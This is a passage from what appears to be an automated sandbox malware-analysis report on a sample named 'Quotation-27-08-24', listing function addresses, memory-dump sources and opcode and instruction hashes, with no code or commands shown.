                                          • Opcode Fuzzy Hash: 0695e779b7ba2136da748b8790fa41f6556584688f36c860ff4e1efc7914f5c4
                                          • Instruction Fuzzy Hash: 1E31C472E00215AFDB21EEA9CC41BEEB7B9EF88760F114426F416E7250D2749E00AB90
                                          Function 010260B8 Relevance: .1, Instructions: 95COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d7cc7e3fa4e6d5a13b534a0c69eb7e71a13b2d23c72ffcc9dbcf0c8a251cb7b2
                                          • Instruction ID: a7f034cecf8e001c56df9ea98df85f0f8ae26f4938cee1aba1ff255e1b7abab6
                                          • Opcode Fuzzy Hash: d7cc7e3fa4e6d5a13b534a0c69eb7e71a13b2d23c72ffcc9dbcf0c8a251cb7b2
                                          • Instruction Fuzzy Hash: 92312431A00221ABDB129FA8CC40B6FBBF9EF44744F244069F985DB352DA36ED009B90
                                          Function 00F607AF Relevance: .1, Instructions: 95COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a065e7e533888886c77ef273cc9a1eecfb7d25728c3c4609dfcd1f7dea3ac9ff
                                          • Instruction ID: bdfac9bfd4becf3410e3c83f92ae0fe0d847500e540a9023301054e7639fab2d
                                          • Opcode Fuzzy Hash: a065e7e533888886c77ef273cc9a1eecfb7d25728c3c4609dfcd1f7dea3ac9ff
                                          • Instruction Fuzzy Hash: 9331D172A04711EBC722DE348880EABBBA5AF94360F214529FC55A7351DE34DC01BBE2
                                          Function 00F68550 Relevance: .1, Instructions: 94COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9b45d57b286fb6b873bf80312a5336894d0668c5f1e25a3a744785c425895a0a
                                          • Instruction ID: 1bb434196ec0c5f0130785d6552d722acbb0b604f9ed727f4a556d101cb1fae3
                                          • Opcode Fuzzy Hash: 9b45d57b286fb6b873bf80312a5336894d0668c5f1e25a3a744785c425895a0a
                                          • Instruction Fuzzy Hash: 66319A72A093028FD360CF19C941B2AB7E4FF88760F184A6EE88597251D770EC48EB91
                                          Function 00F9A6C7 Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                          • Instruction ID: 786704dfeacab0146faa30ec413535c849ab9540956963f21b16ff96d69c0e82
                                          • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                          • Instruction Fuzzy Hash: 9A310E72B00B01AFDB64CF69DD41B57B7F8AF48B60F14452DA55AC3651E630E900AB62
                                          Function 0100EBD0 Relevance: .1, Instructions: 91COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 82abe820ff76962728bed0915af35b8c637c8863093f22e2a71cda75dfb7169e
                                          • Instruction ID: fd981592e072714b9318d5cffdf47c05d7035c6b3d07ede266c1f50463798d95
                                          • Opcode Fuzzy Hash: 82abe820ff76962728bed0915af35b8c637c8863093f22e2a71cda75dfb7169e
                                          • Instruction Fuzzy Hash: 7C318D71A053098FC752DF19C54095ABBF1FF89314F4489AEF8C8AB292D332D945CB92
                                          Function 00F8438F Relevance: .1, Instructions: 89COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 95365fc9d7ab9f8f3f39186ac812d1d4d333be38e37a36d4e413854eda443b00
                                          • Instruction ID: 107fd74af78c7f90f437418c0d4ba994cfa0ad4b9d276758e4e9c803e128d6aa
                                          • Opcode Fuzzy Hash: 95365fc9d7ab9f8f3f39186ac812d1d4d333be38e37a36d4e413854eda443b00
                                          • Instruction Fuzzy Hash: 2431D172B002069FD720EFB8CD82BAEB7F9AB84704F10852AE445D7295D734ED45EB90
                                          Function 00F5CB7E Relevance: .1, Instructions: 89COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                          • Instruction ID: c681285e23a95577bc5519967456f26fc4bf3918907531cd2161960337093520
                                          • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                          • Instruction Fuzzy Hash: 0F21F236E4025AAACB119BB58841BEFB7B5AF44750F198035AE56E7340E231DD04ABE1
                                          Function 00F5C156 Relevance: .1, Instructions: 88COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fd243c486fa80fa8d4c0d142e78c9be5cbdaeed25b06d4b794b4da319e9c7a3a
                                          • Instruction ID: d619dadd8eea5561a3303f47fa69bbd59d2b9c5913d0b7c660b201b7333fef43
                                          • Opcode Fuzzy Hash: fd243c486fa80fa8d4c0d142e78c9be5cbdaeed25b06d4b794b4da319e9c7a3a
                                          • Instruction Fuzzy Hash: 7A3129729003108BCB20AF24CC41BE977B4EF41314F64C1A9EC899B342EE399D86EF91
                                          Function 0101C3CD Relevance: .1, Instructions: 88COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                          • Instruction ID: 12e0abaa2f230e32474e1d9636098eddec554cab4b688dd8a7ebced3a8581707
                                          • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                          • Instruction Fuzzy Hash: 41212D3A68065177EB15AB958D01FBBBBB5EF40710F40801AFAD587651EB3CDD41D360
                                          Function 00F5E420 Relevance: .1, Instructions: 88COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4e26a0fa17ed7e0d946784a2b9494e6eb76df0180684e422804d76d80002783e
                                          • Instruction ID: e5c4eacc63b56da170d4235fe9a46db312fb4809057b8eadc5435c5928f5b6f9
                                          • Opcode Fuzzy Hash: 4e26a0fa17ed7e0d946784a2b9494e6eb76df0180684e422804d76d80002783e
                                          • Instruction Fuzzy Hash: EC310A36A0012C9BDB35DF14CC42FEE77B9EB15750F0100A1FA45A7290D674AF84AF91
                                          Function 00F944B0 Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4e5b909f6f178c65c7c58bd8cf63a09c302bde7079f6a596fb2b5e21c2c9104
                                          • Instruction ID: 3abe7a49f8553abf76f1198e1ccecded2e95d69c5a3e6d3a5cac60f1f3bfb564
                                          • Opcode Fuzzy Hash: b4e5b909f6f178c65c7c58bd8cf63a09c302bde7079f6a596fb2b5e21c2c9104
                                          • Instruction Fuzzy Hash: 4221E372A047059BDB22DF58C840F6B77E4FB88720F094519FD589B241C735ED01ABA2
                                          Function 00F94588 Relevance: .1, Instructions: 87COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                          • Instruction ID: c9e224c2dacd5ead0ce184f9d81f4c539defdb767a420079d4b93a2b98f4c165
                                          • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                          • Instruction Fuzzy Hash: 262191B2A00608EBDF15CF58C980E8EBBB5FF59710F108169ED259B241D675EE06EB90
                                          Function 00F5E388 Relevance: .1, Instructions: 86COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                          • Instruction ID: a88298a83d05b61f749b721117ea0ad084dbefb058a3e7e0e2cbf2607f6ca86b
                                          • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                          • Instruction Fuzzy Hash: 7631BF31600604EFD725CF68C884F6AB7F8EF45354F1045A9EA52CB291E734EE05EB51
                                          Function 00FDE609 Relevance: .1, Instructions: 86COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 417c18f17e926a19628af18f69f8022646c6bce3c197f637435488ec4e814acd
                                          • Instruction ID: 4e638e813abd06c634a84738cbb36249d1e46a27d6b66a03d3cc41876a738982
                                          • Opcode Fuzzy Hash: 417c18f17e926a19628af18f69f8022646c6bce3c197f637435488ec4e814acd
                                          • Instruction Fuzzy Hash: 6A31B175A10205DFCB14DF18C8849AEB7B6FF94704B19846AF8499B391E772EE40DB90
                                          Function 00FE06F1 Relevance: .1, Instructions: 79COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 577021e61e4b01255bd16c54d100cd845c72eb80cb0bd495c3e65fc56c9e233d
                                          • Instruction ID: 3f01e412836b7abc8642e2880c5d7428bef6c4d6da40fc78c20baed1065e22c3
                                          • Opcode Fuzzy Hash: 577021e61e4b01255bd16c54d100cd845c72eb80cb0bd495c3e65fc56c9e233d
                                          • Instruction Fuzzy Hash: 90218071900629ABCF20DF59C881ABEB7F4FF48750B544069F941A7240D778AD42DBA1
                                          Function 00FE019F Relevance: .1, Instructions: 78COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 508c2564f27f36b5015fc9c93ad9bef03c9c3d583445d9e24cfd143f72317932
                                          • Instruction ID: e409f04705b34f354505046c619497fd15a97b962371fe720ae331cb11cc5eb8
                                          • Opcode Fuzzy Hash: 508c2564f27f36b5015fc9c93ad9bef03c9c3d583445d9e24cfd143f72317932
                                          • Instruction Fuzzy Hash: 6221DB71A00644BFC715DB69CC40F2AB3A8FF48740F14406AF904DB691DA78EE40DB65
                                          Function 00FE0283 Relevance: .1, Instructions: 74COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d43e085b13c10d534b98090917244e32b1a223c1aae593b564005d9e18f5d92c
                                          • Instruction ID: 0080b992957610e8ea396c41f92dc0ce880cfe429f07ab282dab1f19803c1b6d
                                          • Opcode Fuzzy Hash: d43e085b13c10d534b98090917244e32b1a223c1aae593b564005d9e18f5d92c
                                          • Instruction Fuzzy Hash: E121D3729043859FC721EF5AC848B5BB7DCAF80750F084466BD84C7252DB74DA84E7A2
                                          Function 00F82835 Relevance: .1, Instructions: 73COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: de6d138e2727db72e5056e26f58eb290d8829330a20a7f723005b66d66436fa8
                                          • Instruction ID: a9f030375201ed6dd3c16151f7ee895690b986b52c97898f2026bde705e16cd7
                                          • Opcode Fuzzy Hash: de6d138e2727db72e5056e26f58eb290d8829330a20a7f723005b66d66436fa8
                                          • Instruction Fuzzy Hash: DF213B32A44685ABE73267288E05F643794AF41774F280365F9219FAD2DB6CEC41B302
                                          Function 00F9A30B Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e4b2df65526c32b95a35a797bf89ff0f4d6459c8de670ae9840448717e91ade3
                                          • Instruction ID: 15c05cd3ddab7403154b35906fe3bc9aed176574e8d43d0c58e32a407f556cf0
                                          • Opcode Fuzzy Hash: e4b2df65526c32b95a35a797bf89ff0f4d6459c8de670ae9840448717e91ade3
                                          • Instruction Fuzzy Hash: 6C21BE35600A00AFCB25DF29CC01F5673F5FF48B04F288469A449CBB61E336E942EB95
                                          Function 0101A49A Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3217cc8fb5ce1db43cce17c51e8747d3740661f5061846b8357dc6021037c868
                                          • Instruction ID: 5f29efe0aa3fe26f5b70b52f12f87c4df07a1eeac40b14ec8545987512409ff5
                                          • Opcode Fuzzy Hash: 3217cc8fb5ce1db43cce17c51e8747d3740661f5061846b8357dc6021037c868
                                          • Instruction Fuzzy Hash: 73112372385B10FFE72256589C01F2B7699AFC4BB0F100028B748CB294EF78DC018795
                                          Function 00FE0946 Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ded352a6a58ab32f2ec9761a64a0a7b56a9841db48b4530bc9d7adc9ff9aa19b
                                          • Instruction ID: 532b12fb6ec62306342406030db7bb2b4f8af13a231160db9c88b3873e1968ff
                                          • Opcode Fuzzy Hash: ded352a6a58ab32f2ec9761a64a0a7b56a9841db48b4530bc9d7adc9ff9aa19b
                                          • Instruction Fuzzy Hash: 5121EBB1E01348ABCB20DF9AD8819AEFBF8FF98710F10012EE405A7351DB749985DB54
                                          Function 00FF80A8 Relevance: .1, Instructions: 69COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                          • Instruction ID: e77c23455b7b70080c22e45105162e5a1f8ef887442186e361707a6ebc51dbe6
                                          • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                          • Instruction Fuzzy Hash: 8F216D72A00209AFDB129F94CC40BAEBBB9EF48360F204456FA05A7261DB74DD52AB50
                                          Function 00F90124 Relevance: .1, Instructions: 68COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                          • Instruction ID: f88c4aa3aa473e7885abcfd475e2f912c78d662ecdb1b47dd2dacf76fc654308
                                          • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                          • Instruction Fuzzy Hash: 02110473600614BFEB229F54CC41F9ABBB8EF80B60F204029F6048B180DA71EE84EB54
                                          Function 00F68770 Relevance: .1, Instructions: 68COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 01c7af6651efe2221b9ee1ba51357e81f70c20afb195478e2ad8ddcf84dee662
                                          • Instruction ID: 72a2b1719337c627c4d55a607090956fbf6a630df7b28adeabbc0326032d02f2
                                          • Opcode Fuzzy Hash: 01c7af6651efe2221b9ee1ba51357e81f70c20afb195478e2ad8ddcf84dee662
                                          • Instruction Fuzzy Hash: B511C432B006109BCB11CF59C4C0A26B7E9AF4ABA0B28426DED089F205DAB2DD02D790
                                          Function 00F9AAEE Relevance: .1, Instructions: 68COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                          • Instruction ID: 65a7d45c7675ec9e883fb4085e6df8354452db0f98538d9c232c040dfa82c192
                                          • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                          • Instruction Fuzzy Hash: 14219D72A00A40DFEB31DF49C540A66F7E6EBD4B20F24803EE44A97A21C775ED01EB81
                                          Function 00F680E9 Relevance: .1, Instructions: 66COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8814023fc16ae2d854aab5903f4a9fb9a6ff0baf91589795cddbabedd0b8a804
                                          • Instruction ID: 67d91050acd195914120ba03d452845c9ddeb20df04811df82d1344f59e09ffd
                                          • Opcode Fuzzy Hash: 8814023fc16ae2d854aab5903f4a9fb9a6ff0baf91589795cddbabedd0b8a804
                                          • Instruction Fuzzy Hash: 5F215B76A00209DFCB14CF98C581BAEBBB5FB89758F24426DD105AB311DB71AE07DB90
                                          Function 00F9674D Relevance: .1, Instructions: 65COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 78f92769e3031877eb907d3998db37cd639d492fee1eb725fcf591abc6cc668d
                                          • Instruction ID: 172d7ff9a2616dbf7395a034daba6eb1ea791672b13fd0954f7f412cfbb4a9e0
                                          • Opcode Fuzzy Hash: 78f92769e3031877eb907d3998db37cd639d492fee1eb725fcf591abc6cc668d
                                          • Instruction Fuzzy Hash: 62219D75600A00EFEB608FA8C881F66B3F8FF44754F50882DE4AAC7250DA70BD40EB61
                                          Function 00F8E8C0 Relevance: .1, Instructions: 63COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5e15f9e29425a5ab0ba9d89a43fa33d1b79726ba1a6bc84fc34ca78b71b0e62a
                                          • Instruction ID: f3ba8e9c5f19af935aab4557717881dffa9d49b00f2bcf69c3f57a10cf368e43
                                          • Opcode Fuzzy Hash: 5e15f9e29425a5ab0ba9d89a43fa33d1b79726ba1a6bc84fc34ca78b71b0e62a
                                          • Instruction Fuzzy Hash: CC11E1337001189BCF19DA24CD86B6BB267EFD5370B358539E9268B290E931DC02E791
                                          Function 00FF6870 Relevance: .1, Instructions: 63COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 11e47b5e923c25a0c819bd976aaf6d9769e507810208d745009ed93ddec64661
                                          • Instruction ID: 2c8486409bc51722ba20f4a94a11b08b81afc50a917bba1f37cc37e1425c3ac8
                                          • Opcode Fuzzy Hash: 11e47b5e923c25a0c819bd976aaf6d9769e507810208d745009ed93ddec64661
                                          • Instruction Fuzzy Hash: F7119432240518FBD722DB69CD40F6A77A8EF59BA0F114025F305DB261DEB4ED05E790
                                          Function 00F966B0 Relevance: .1, Instructions: 61COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 34495444b1b9e159c9bbf80c899b8f895d52f3cd50de1f26449ff5b63fce7034
                                          • Instruction ID: 6d575e7b5ab3017f101f024f2266ddc2ee963c81d70f4f4b70eb45aea7f9a6c2
                                          • Opcode Fuzzy Hash: 34495444b1b9e159c9bbf80c899b8f895d52f3cd50de1f26449ff5b63fce7034
                                          • Instruction Fuzzy Hash: 5F11C176E01204DFDF25CF99D980E5ABBE4EF84724B15807AE809DB311EA34DD00EB91
                                          Function 0102A8E4 Relevance: .1, Instructions: 61COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                          • Instruction ID: 4bdf3acdb8515a1dd4cd040831817fbfe0c10fa9158fe3de01a690322a59c645
                                          • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                          • Instruction Fuzzy Hash: C511C436B00929EFDB19CB58CC05B9DFBF5EF84310F058269E89597340EA75AE51CB80
                                          Function 00F60AD0 Relevance: .1, Instructions: 61COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                          • Instruction ID: 10287e60cf42a49d762ab8a094b7ef21403ab463f8c62ae5d0173e2c9c8e753a
                                          • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                          • Instruction Fuzzy Hash: FD21F4B5A40B059FD3A0CF29C441B52BBF4FB48B20F10892AE98AC7B40E771E814DB90
                                          Function 00FEE7E1 Relevance: .1, Instructions: 59COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.2470704113.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_f30000_Quotation-27-08-24.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
